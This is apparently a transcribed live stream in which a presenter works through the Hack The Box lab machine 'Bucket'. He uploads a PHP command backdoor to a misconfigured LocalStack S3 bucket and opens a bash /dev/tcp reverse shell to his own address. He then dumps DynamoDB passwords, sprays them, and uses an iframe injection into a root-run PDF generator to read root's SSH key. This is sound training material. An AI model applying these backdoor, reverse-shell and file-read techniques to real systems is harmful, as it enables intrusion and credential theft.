And we are live.
Let me see. Yeah, we're good.
Awesome. Good evening, everyone. We don't have any announcements this week. This week, I'm going to be going through Bucket, which is deals with local stack and of using AWS. You have anything, Nevin, before I get started?
No, nothing for me. It's a cool box, especially if using S3 buckets. So excited to see what you can do, Sam, tonight.
Yeah. Awesome. So we'll get started. I already pulled up my terminals here, got them, enlarged and everything. I'll just grab this IP. So we'll just start off with a simple nmap. That's not. I use default scripts, service enumeration, and while that runs, I'm going to add it to my hosts. I'll just do 10. Oh, okay, and we'll add bucket.hackthebox. Cool, so our scan came back. We've got SSH open. That's pretty standard on these boxes. Just allow for a persistence point. Just say it's Ubuntu server. And we have port 80 open, running Apache web server. It does say that it is being redirected, which is interesting. So it's probably good that we put, this is part of why I always start off before, when the scan is running, I'm always throwing the host name. They're always in the standard name, like box name dot hack the box. Just make it easier, if there is any web things that are redirecting. In this case, like this will save us some time, but also just saves time command lines. You don't have to go back and constantly be, copying and pasting the IP. And other than that, we don't really get too much. We can take a look at this Apache version as well, but I'm definitely curious about the server itself and what it's running. Looks like there's some CVs. I don't see anything crazy off the bat, but we can take a look. I usually try not to go down too many rabbit holes before I even look at the web server, but uh, HTTP smuggling. Yeah, none of these we're really going to be able to do anything with until we take a look at it and see what's actually running on it. So let's do that. So you see I've already been there. So looking at this, we've got this bucket advertising platform here. Not any, got a couple buttons here. Nothing's doing anything. And it looks like parts of this web page, it's either not finished or broken. So we can take a look at the page source here. Actually, I'll just just view the full page source here. We'll just see if we can find anything interesting, because obviously something is not working well. We do have an email, which could come in handy. And what's really interesting here, let me see if I can make this a little bit bigger. Yeah. So what's really interesting here is that all of these image sources are s3.bucket.hackthebox. So that's probably why these aren't loading. We're looking at this and these aren't loading. So let's go back and just add that to our Etsy host as well. So we just do s3. And now we can go back and try reloading this, and we should get these images to pop up now because should be able to reach these endpoints. Did we break it? Maybe it doesn't like the hashtag there. Did I type something wrong with it? s3.bucket.hackbox. Yeah, that should be good. I can also just try typing in the IP maybe.
Do you save your S3 or the Etsy host?
Yeah, I did. I'm not sure. Are we able to ping it? Oh, it looks like the box went down. That's fun. Let's see if we can. Let's see. Looks like the bucket is offline.
Try removing the dual entries in your Etsy host. Just do bucket.htv.
You have to add the second one for it to resolve. The regular bucket, I can try doing that and then pinging it, but it should be fine.
Or if you want a solution, just copy paste. The ratchet solution is just copy paste the 10 IP next line and then add s3.bucket.htv.
Yeah. Not sure if that will be magic or not, because it does say it's online. Am I able to ping
Try
it?
picking it now.
Now I'm
Try
able to ping it.
S3. Etsy host doesn't like the multiple entries on one line typically.
It's a bit odd. Yeah,
Yeah,
there
there
we
you
go.
go.
Had it like that last night too. That's weird. So let's try going to the web page now, and now we'll get our images, right? So, um, yeah, this is pretty handy. I mean, we usually check the source page anyways, but being able to, get this extra subdomain. So, there's a few interesting routes that we can go from here. I think we should probably, touch on S3 and AWS. I mean, it gets thrown around a lot, but not a lot of people know really what it is and how it works. So, we can just look up like S3 and see if they have like a good documentation. But essentially, it's a service from AWS where you can store objects. It's object storage, and you can make those available through API calls or HTTP, HTTPS calls. And you can use an S3 bucket to host a website. So in this case, it looks like, it may not be hosting the whole website. It could be hosting the website. We don't know. We do see this, s3.bucket hack the box, and then we see this. This indicates that this is the name of the bucket, this add server bucket. And inside that bucket, we have images and this bug. And so, we can actually look and see, maybe we can find the index source. But essentially, what's happening here is, every bucket is going to have a unique name, and you can assign permissions to the objects in that bucket. And we can use the AWS command line. They have a command line interface, the AWS CLI we can use to make interfacing with these buckets easier, since we don't really want to go to the GUI. But essentially, this is how it works, right? So you can put data in our bucket and control access, different storage classes. This is way more advanced than we really need to know. Um, all we need to know is that there's a bucket, it's hosting this content, and we can interact with it. So since this is publicly accessible, it's likely the bucket is hosting the website. So if you don't have it, what you'll do is you'll do sudo apt. Yeah, you can see I already ran it. Sudo apt install AWS CLI. I'm not gonna do that. I already have it. But then when we get started here, we can go. We just do AWS help, right? And when we do that, it'll give us, a really long, if you don't know all the different AWS tools and services they offer, we can go through all of these. Comes with all the different options. I happen to know which one we're looking for right now, so I'm going to drill down to that one. So we'll start with S3 help. And with S3 help, it'll give us a few different, tell us what options we want, so we can have a local path. We can do a URI. Let's see what else we could do. We need. So this is important, right? We can copy, move files, remove files. That'll be helpful. And then you can also do some other options on these objects. Include, so I like to look for like the examples. So what we can actually do is go AWS S3. We can just read their documentation. They'll often have a, see, we have their command line reference for S3. And we can go all the way down and see they don't have examples in this one, but we do have, you know, this is helpful, right? So we can see we're doing AWS S3, whatever operation on the bucket, and this is just stuff related to that that specific instance. So let's get started. We know, right, the we know the name of the bucket, or we think the name of the bucket is this ad server. That's typically how these S3 buckets are structured. So we need to do AWS S3, and you can see I already did some of this. So we'll just check this and we'll just do ls, right? And you can see another important thing to note about this is when you first spin this up, you'll have to do AWS configure. So what AWS configure does is it lets you can see I just put my name in here, I just put Furio, so I'll just do this again. But essentially, we don't have an access key, right? So all of this object, these access to these objects are permission based, and if they're configured incorrectly, um, typically you'll require credentials to administer the bucket, but it can be misconfigured and it can, be set up so that it's not actually validating those credentials. So you can see I literally just put Furio, Furio, Furio for all of these, and we don't need an output format. And once we do that, we can see, right, we're able to list the contents of this endpoint. We put in this endpoint URL, and the rest of our commands are going to follow this similar structure where we're setting this endpoint URL because it's not a typical, you know, the S3 stack is actually being hosted here, and I'll talk a little bit about why that is later and how that works, but it's not, typical AWS. This is running AWS infrastructure locally. So, we can ls this, and now we can actually just do the same thing. If we want to figure out what to do next, we can run help, and we can see, what else we can do. So I think, let's see, what we're looking for here is something to actually look at the specific bucket, right? Like we listed all of the buckets on that server, but now we want to list the contents of that ad server bucket. So let's see if we can find. It looks like you just specify it at the end here. So we can just do S3. Yeah, you can see I already ran that. So that should be good. Ad server. Now we can list the content so we can see our index HTML and our images. And we can even drill a little bit further into that and list the images. And so we don't actually see anything in here, but we're able to see our index and stuff. So that's good. At this point, we probably want to try writing something to the bucket because we can read it. Where we're gonna escalate from here is to actually be able to put our own files in this bucket. So I'll just do like a little echo test into this test.txt, and then I'm gonna go back and instead I will copy this test. You can see I already did this. So essentially what we're going to do is this, we specify our endpoint URL. We're going to copy the test file that we just created. And we're going to copy it to this ad server just in the root directory of this ad server. And then we should be able to just ls that. And look at that. So we can see our text file is there. And we can even take that a step further and just curl this. curl that. And this is interesting. So we see this URL was not found on the server. We can try to go to the actual site as well and just see. So now it's not found. We can try running again that ls, and it's no longer there. So there's something on the back end, right, that's going to be clearing out this bucket. Um, this is actually pretty common, but it's really frustrating, especially in our case. So we're going to want to get some kind of persistence. And we're going to have to do it quick, right? I believe the wipe timer is like somewhere in it's like less than a minute, probably like 30-second range. So we got unlucky there and caught it on the back end, but usually it'll stay up for long enough to do what we want to do, but not long enough that it's there forever. So I do have this shell, this little PHP backdoor already saved here, so I can just cat this out. This is pretty simple. It's just gonna echo our command. So we'll just hit our PHP, do a question mark command, and then set our command, and it'll run it and return. So we can try the same thing that we just did here, where we copied our test, but let's do that as a and we'll go back here and just do okay. And now we just want to ls this, and we can see it's not there. So let's try that again. Okay. This is completed. And it looks like right there we got really unlucky because it is here. So let's go back here. We also don't know that this is going to execute, so we kind of want to validate that as well. Let's just do ID. Okay, so it looks like we missed it again. Had like a really short window here. Oh no. Another thing to note too is we're uploading this to this s3.bucket.hackthebox, and it is replicating to the main server, but a little bit slower. So what we can do is we can go to s3.bucket. And turn this up. Come back. Looks like that actually. And we just want to curl this, actually. Let's do this down here. Oh, that's right. Yeah, I forgot about that. So when we're pulling it from when we're querying the actual S3, it's gonna just retrieve the content, not actually execute it. So we do want to get it off of the main server. So we just kind of have to wait for it to replicate. And here we go. So we did get execution. It took a minute there for it to replicate. Just poke at it a little bit more and try a couple other things, but that is how it works, and this should get wiped pretty soon. So our next step, right? This is obviously not good enough persistence. It's getting cleared out pretty quickly, and it takes a while to replicate. So we'd like to get a reverse shell ideally. So we can set that up here. I'll just do netcat, and we'll listen on. And now we can, let's see, we can actually just go, let's see, get my notepad up, or we just want to do curl PHP, and we want to data encode, URL encode. Can't spell it today. bash tech c bash tech I pipe at sign dev slash tcp slash gotta get our IP address. Uh, 10.10.14.2. What did I say? I said 1337 and 1. That should work. See if we still have our shell here, if we have to re-upload. No, we have to re-upload, okay. So let's do that, and then we can wait for that to come back, and then we'll run our little reverse shell here. It's probably going to take a second to replicate over. Okay, here we go. We've got our short window, and we have a shell as www data, so that's nice. And we do want to upgrade this. Let's do our Python 3 taxi import. If I could spell today, that'd be crazy. Import pty spawn.
You have span instead of spawn.
That's lovely. Okay, let's hope that works again. Lovely. Python 3. Just type it really slow so I can make sure I get it the first time. Import pty span. We'll do our bash. There we go. We've got our bash, and then we can do our control Z and sty raw echo foreground. Perfect. Now we can do all our stuff. Okay, so we want to. We're in the www directory, so we can actually go one back and just take a look. We see our bucket app here. I'm curious what users there are, since this is obviously not how we get our flag, and we do have this user Roy. We can't actually do anything with that, I don't think. Let's try to, yeah, so we've got our user.text. I assume we can't cat that, but might as well try. Nope. Let's look at this project. We've got these database, vendor, composer lock. What is this database? Can we look at this? Oh, we can. Okay, so we've got a DynamoDB as well, which is, that's AWS's NoSQL database. We can also interact with this. So this will probably be interesting to go off of, since we don't have, we do have, our shell is www data, but we need to pivot now to an actual user before we can escalate further. It doesn't look like this user can really do anything currently. And if I had to wager a guess, it would be that Roy has credentials hidden somewhere. So let's go back to our, and I'm curious about this bucket app. We do not have permissions. Okay, so we'll probably want to put this on the back burner. Just keep this shell for now. And this is good to have, but you know, can we like cat? Yeah, so we have our user Roy, and that's it. Or we can just do, yeah, so we just have root and Roy that can actually log in on this box. So we'll have to find a way to get to Roy. We do have this shell for now, which is good, but we can go back here and figure out how we can try to interface with this DynamoDB instance as well. So actually we can do it from here most likely because it should be running on this box, and we can actually validate that. You can see. Uh, just do netstat, and we'll just see. Yeah, so we do have this 4566 running, and if we scroll back up a little bit, we can see in the config file. If you didn't know it already, then you would know. You could see that this endpoint is being hosted locally. So it is hosting this DynamoDB on this box. So what we can do, yeah, let's. Oh, we want to stop that. All right, so we can actually check if we have the CLI here, and we do. So we can try to run these commands locally, and we'll just do our HTTP 4566. Terminal is not fully functional. Okay, so we can do that. So what we want to do is get item, write item, create table. We want to see what tables there are. Get item, list backups, list tables. That's what we want. We can list our tables. Let's specify a region. That's right. So we do have to do the configure. Since we're on a different box, we'll just do test, test, enter. And here's where we run into an issue, right? This www data doesn't have permission to actually do anything on the box, so we can't configure the command line interface to mess with the DynamoDB locally. So at this point, we want to go back to our main host and work on it that way. So I can just grab this. Let's use AWS. We can literally just do. We want it to be though bucket.hackthebox, and we'll do dynamo. And what was it we said? We said list tables. Invalid choice. Oh, I said AWS S3. Well, the tables. We got the DynamoDB comes at the end. Specify the endpoint URL first, and then do list tables. DynamoDB list tables. No? Oh, it's the S3, I think. Endpoint should work then. There we go. Okay, so we have a table. We have one table, users, which is pretty interesting. So let's go back to our help. We need to figure out a way to dump this table, right? Let's see. Probably like describe or list something. List, no. Scan maybe? Scan probably looks to be the best out of these. I don't think. update.
His headphones died. 30 seconds.
Sorry about that. Headset died without warning. That was very funny. Normally it does like the little beep beep, I'm about to die, but it did not. It was just like I'm out. Alright, so yeah, this scan looks to be the best. None of these other ones are really suiting my fancy, so we'll just do scan, and we have to specify table name. Let me just run that. And you can see we do get a list, so we have these couple users, 3 users and 3 passwords. This management, welcome 123, and this N2 something for sysadmin. So what we want to do here, we have these passwords and we have this, shell is www and we need to pivot to Roy. So the logical next move here is going to be to try to SSH or elevate as Roy. So let's just do one of these. Let's see if we can just SU. And just and so it looks like that did work. So that's awesome. We can now just exit so we do know that this password here worked. Let's also try to SU root, see if there's, just go for the low hanging fruit, right? Nope. Let's try this one. Oh, nope. So we got lucky that the first one we chose was the password for Roy, and that's all good. Alright, so now we have our password. We can just exit this and actually just clean SSH in. I do want to show off, I didn't run it here, but I have a really cool, um, say there's a lot more users and passwords than just this. These 3 make it pretty easy to just copy and paste. But if we wanted to say like pull all of these passwords out to try to like spray, what we can do here is actually, you can see I already have it highlighted. I ran this already. We can do a little bit of JQ foo with our our object that were returned here. So you can see we're pulling out this. Oh, I don't want that. So we're going to pull out these out of the items. We want the password, and it's actually listed as a string in here. So it's like item password string and then the password. So if we run this, we can actually just see what it returns. This is going to return a list of our passwords. So say we dumped like 50 or 100 passwords. We could do something like this. We could also you can do some crazy stuff where you pipe in like a previous JQ query. So you can pipe in like a list of users. So you can do, a giant document with user colon password. In this case, we really just want the passwords. So we can do this and output that to passwords. And then from there, we can go down here. We could do like a crack map exec. You can see I already have it here ran. We can SSH. This is actually the wrong IP. So we'll do uh, bucket.hackthebox. And we have our list of passwords now, right, that we pulled from this. And now it'll try to, so say, in theory we had 50 passwords. This would tell us right off the bat which one would work, right? So now we can SSH is my thing all messed up? Let's get rid of that one. Let's get a new terminal down here. That's about the same size. I don't have tmux set up on this box yet. This is like a fresh Kali install, so normally I'm like running tmux with all of this, but we'll just make this work for now. Okay, so we can just do uh, and we've got our password here. And now we're in, so let's actually flip-flop these. Let's throw this one up here. Oh, we don't want it that big. Awesome. So we've got our bucket, or our shell is Roy. So let's grab our user flag while we're in here. Awesome. So we're about halfway there. Um, Now, next we want to go for our low-hanging fruit, so we can do like a sudo tag L and just see here. Grab our password again. See, you cannot run sudo on bucket. That's fine. Um, let's see, we can do netstat again. Get a full look, so we can see all the ports now. So we have this. This is our DynamoDB, SSH. This port's a little interesting. So is this 8000. The 80 we know is our web server. So yeah, these two are definitely of interest. We can try to curl this. Let's do HTTP dot 8000. This looks to be some kind of joke. I don't know if this is how relevant this is. Looks to be some kind of web page. Site under construction. Okay. I wonder if that's what this. I wonder if that's what this project is. Probably not. Yeah, I mean we had access to this before. This is nothing special. It's just spinning up the DynamoDB instance. We have this vendor. Oh, this might have AWS creds in it. No, it's just an SDK. No. We can also go back to our, remember there was this like bucket app in here that we didn't have access to, so maybe we can cd into that now. And it looks like we can. So now we've got this Java file index PHP. That might be what we were looking at before. Yeah, looks like this is exactly what we were looking at. So this is what's running on port 8000. So what I want to do now is I want to forward this port so I can mess with it. So I'm actually going to exit this, and you can see I had the command earlier, but we'll just do we're gonna listen 8000 was the port, right, to 127.0.0.1.8000. So this is going to forward all traffic locally from 8000 to this port 8000 on bucket.hackthebox, and then we'll be able to mess around with the site and kind of see what it's actually doing. So if I go in here, now we can go to the site here, site under construction. Looks like we don't have much. We just have some. It did kind of look to be like a bunch of junk, but at least we're able to take a look at it. Let's take a look at the source here. It's just a bunch of CSS, a bunch of CSS. Okay, so we don't have too much there. What else we got here? Oh, this is interesting. So we have something at the way top here. Let's go back up. Or is this not even on here? This is just in the base of the index. Alright, let's do like head. Let's cat this again. Now we know there's something at the top. So let's take a look here. So it's using the DynamoDB client. So it looks like if server request method is post, this is actually pretty interesting. So let's try to break this down. So we've got actually get rid of this so I can like take some notes on something here. See if I can like explain it a little bit better than just by so if there's a post request with action and get, and the action is right. So we're gonna have this as step one. This just makes it easier to visualize, when we're looking at this PHP. So we have the if post request is action get alerts. This is all the same stuff. This is just using the client. It's going to check DynamoDB for alerts table. This is going to get everything in the alerts table. Scan table name alerts title. So it's looking for anything in this alerts table with the title ransomware. Title is a type of field within DynamoDB. So let's do that. So it's going to check everything in that alerts table for something that has title ransomware. It's going to pick a random number between 1 and 10,000 and put contents file pass through. Okay, so it's going to take our like whatever data, right? File put contents. So it's going to take this data, item of data, and it's going to generate HTML, right? So that's our third step here. We're going to I'm sure you can already kind of see where this is going. Our final step is going to be to the PD4 command. So PD4 command just outputs a PDF based from an HTML page. So what we're going to look to do here is try to insert like an iframe or something into this data request, and we'll see if we can get it to point to the something that we actually want to read. So iframe is like an HTML element, so it's going to just, load external content. So we can say like, oh, we want it to load from this local file. Um, Obviously, this all assumes that this is running as, a privileged user is Roy or above, but given what we've seen so far, it's likely that it's, running in an elevated context, this whole stack is. So, we can say, I want you to load, locally this file, at C hosts, or, you know, whatever we want. In our case, it'll be like the private key, so we can SSH in, or we can just have it read us the root flag and be done. So um, yeah, that's interesting. So the other thing I want to check out, because we can actually figure out if this will even work before we go down this rabbit hole, is we can go to our Etsy, I believe it's like Apache, yeah, Apache 2, and we can go to sites enabled, and we only have one, so let's cat this out, and we can see our port 8000, and here we go. Yep. So this is running as root. This web server on 8000 that's hosting this application. This is running as root. So now we know that this application is running in an elevated context, so we can try to pop this. So let's go back. We actually do need we've got our 4 steps. Um, so hopefully this kind of makes a little bit more sense into how it's actually operating. So we're going to have to create this. We didn't have a table before. We're using the same database. So we have to create a table called alerts. And we're going to have to add two values in that table. We have to add a title and also the data. And then we can create an object, or add an item to that table with the title ransomware, and our data will be like our little iframe, asking it to, probably the easiest way to do it is just to have it read us the private key, so we can just SSH in. So, and then we'll get that PDF, so we can either access that locally, or we're port forwarding, so we can just access that endpoint. It is important to note here, we want to know where in this script it's going to create this HTML and actually load it into the there's like a files directory, I believe is what it was, that it loads it into. So we can see here, that's the curl. I just want to see the, oh, it's in the file. There's like a, go back to cd var. So we can see in the bucket app, we have this files directory. And in here, there's nothing, but it will generate our HTML, and it could be, like 2376.html, because it's 1 to 10,000, and then it'll also create that as 2376.pdf, and both of them will have that data that we're looking for. It's going to just read that data and add it. So hopefully that helped. Now we can get our web browser back. And we need to, the syntax for creating a table is kind of confusing, so you can probably see I already looked it up. Dynamo. Yeah, we want this command line reference here. It's the same page we're on. You can actually just go to the top as well and just search for whatever you're looking for. I'll just go to the top of the page here. Yeah, so we can just, we could have searched for whatever we were looking for, but what I always like to do, you can see I already clicked on it. This is what I'm really looking for anytime I'm going to this, is just the example, so I can just rip it off and throw my own stuff in here. So let's do that. Oh, I don't want that all the way big. And let's get our notepad back out so we can make some changes to this. So we want our table name to be alerts. We want an attribute name of title, right? That was what it said, title, and data are the 2 fields we need. We need title and data. So this one actually handy dandy has two attribute names, so we don't have to like duplicate anything. And then our key type is gonna be hash from range for these two. And this is just provisioning the table specs, so like how much read capacity it has, how much write capacity. It's just really a performance thing. It doesn't really matter. And these tags we don't need. Don't really do anything with those here. So just this should be sufficient. And we also have to remember, because this is assuming you're running authenticated to AWS or not. So we need to do our endpoint URL, and we're going to set that as http s3.bucket.hackbox. So let's give this a try here and see what we get. Awesome. So it looks like it did create our table. And we can just do we'll go up a couple commands to confirm that we have our table created. Oh, that's right. I forgot about that. Should be this. There we go. So we do have our alerts table now. So now we need to put our item. So this is going to be our first step. I want to keep these just because we know that this all is getting cleared out. We're likely going to have to do this again to perform the exploit. So I'll start a new line here, and we want to do our AWS. Just do the same endpoint URL. Just start it the same way here. And instead this time we're going to do put item. And we want this table name to be alerts. We just created that table, right? And we want our item to be, and this is where it gets a little confusing. So we have our JSON. We want this to be a title, and this body we want it to be a string with the title ransomware. And we can close bracket, and then data, and our data to be our iframe. We can start off by just running a test. Instead of just skipping like the whole 9 miles, we just want to make sure that the syntax is actually right. It's pretty easy to mess this up. And this looks pretty good. So we've got title, string ransomware, data, string test. And then once we have this set up, so we've put this item, I'm going to get ahead because I believe that this table is probably already deleted. Yeah, it's already deleted. So once we have this, right, we have to be quick with this. So then we want to make our post request, and that post request has to have our action of get alerts. So we'll just do a curl. We can actually specify, the method. So we want to specify post and give it the data. So the data is going to be action equals get, I believe it was underscore alerts. And then we'll just do the okay. So if we do this here, right, we will be able to run this on our local host to curl it, and that should execute it, right? And then once we do that, we'll be able to ls in here, and we should see a file that pops up. So let's give this a try. We'll just see, if this works, and if not, we'll tweak what we have. Oh, that's the wrong thing. Copy. Nope, that's not what. Why is this not copy? There we go. Okay, so we've got our table created. Now we've got to put our item in it. And it looks like our item is there. So now we should be able to curl our get alerts, and we can ls, and we do have this We gotta be quick before it gets deleted. Yep, so we have our test. So we do have our content being created there. Um, yeah, that's executed. So this is perfect. Sorry, it's like kind of hard to explain because you have to be pretty quick with it before it wipes everything out. This files thing is also going to get cleared out periodically. But what we can do then is we can go to here. It's like 8870.html. No, sorry, is it already gone? No, it is there. Should be. Um, yeah, it's already wiped out. So that's the trick with this. You just have to be, really quick. Um, we are going to. Oh, you know what? It's gonna have to be in the files directory here. So I have to go files slash yep, and then it should pop up in here. So what we want to do is we want to just create like a generic like iframe. So we'll do our HTML tag and head tag and slash head. Nope. And we'll do body and generate iframe. And we want it to be source equals, let's just do, like I said, the private key is probably the easiest way. If there is one, it will get read, and then that's like the easiest one, because then we can just SSH in as root. So we'll do this, and then terminate the iframe, and terminate the body, and terminate the HTML. So this should be good. We've got our HTML head, body, iframe, source. Yep. So if we do this, what it should do is inline read the RSA key, and when it converts it to a PDF, it'll, that uh, PD4ML is running as root. The whole web app is, so it will be able to read the key, and it should just pop it in the PDF for us. So we can actually just put that inside of our data here. Should that's right. Let's do a slash here and a slash here. No, we don't want that. Let's give this a go. So we just got to create our table and do the same alerts. Just this time we'll pop in our. Oh, that's no good. Just want to grab our little iframe that we made here. And then we can do our post request. And we can check, see if it ran it, and it did. So we can check here, and we can just download this, open this results PDF, and look at that, we've got our private key here. It's perfect. So now, let's just discard that. This is Vim, I could just call it bucket. bucket root. And we can insert this, and it's going to complain about the new lines here. So let's just edit this. And of course, it's also going to not like that. And so now we should just be able to SSH. We can specify our key, which is bucket underscore root, and then root at bucket.activebox. My headset again, sorry about that. Forgot to chmod that, so let's go back. Bucket underscore root, and then we can just run that same command. And then we're root, and we can cat our root flag out, and we are done. So that's a pretty neat box. One of the really interesting things about this, so this is running what's called local stack, and the way we find that out actually is pretty interesting. So now we're a root, we can do this. We just netstat, and we can see this Docker proxy is running on a few ports here. This 4566 is running Docker proxy. So if we want to drill in and see what's actually running, well, it's like Docker ls. No, it's Docker ps. Yep. We can see local stack here, and if we look up local stack, it's essentially like an offline AWS stack that you can run. So if you're like a developer and so if you're an AWS developer and you want to like test a stack offline without taking in production, we can you know test test and develop that way, which is pretty neat. So for this box, they spun up a local stack and then made it vulnerable, which is pretty cool because I think it's a really cool box. There's a few different ways you can go about it as well. Like I think if you scan, there's different endpoints you can scan, like different subdomains, and you can dir buster as well, and you'll find for the bucket, I believe it's shell. My bad. I believe it's this. No, it's S3. Yeah, so like local stack comes with a yeah, so it tries to redirect here, and this is actually, if you look here, this is actually our container name. If we add this to our host, it'll take us to like a GUI command line interface for DynamoDB, which is pretty neat. So um, when I first did this, I actually did it in a different order. I actually found the DynamoDB first and found the passwords, but didn't have a user, and then had to go back to the S3 bucket and get the upload reverse shell in, and then I found the user and had the password. Um, but in this case, we went through and we already had our shell and we had our user, but we just didn't have creds. Um, so it's interesting because there's a few different kind of paths you can take here. Same thing with this exploit. You can go about a few different ways. There's actually like a vulnerability within PD4ML where you can just, it's not really a vulnerability, but because it's running as a privileged user, you can have it, you know, essentially like embed a local file instead of just using an iframe. The reason I jumped to an iframe was just because I see that it's creating an HTML, so um, that was just my first thought. But there's a few different ways that you can go about it. Um, but you know, definitely mess around with local stack. It's pretty interesting stuff. To if you don't want to use, pay for AWS. It's pretty cheap in general, but if you're doing a lot of testing or just don't want, to be creating like vulnerable stuff and have it, open over the internet, local stack is definitely a really good way to, test and experiment with that. And you can see all of this stuff here is running through 4566. That's why we were able to hit the S3 endpoint. We were able to hit the DynamoDB. That was it was a bit wonky, and like the first time I was going through it, I wasn't really sure why the why I was able to only interface with the DynamoDB, but through the S3 endpoint, just didn't like seem that logical. But when you look at how local stack actually works, it makes a little bit more sense. So, but other than that, I don't think that's all for me. We have anything else, Nevin? We good?
No, it's it. Appreciate you going through it. It is a very cool box because it's the bridging between like your typical hack the box where it's just a typical 80 or Linux network. Now it's actually touching the cloud. So it's always cool to sort of see these types of boxes and these types of machines, and I guarantee you there are going to be more and more coming forth in the near future.
Yeah.
Just where the environment's going.
Yeah.
But yeah, thanks again, Sam. It was a
Yeah.
very cool box.
Yeah. No problem.
Awesome. Well, other than that, I think we're gonna wrap it up and call it a night. Thank you everyone for coming out to watch us.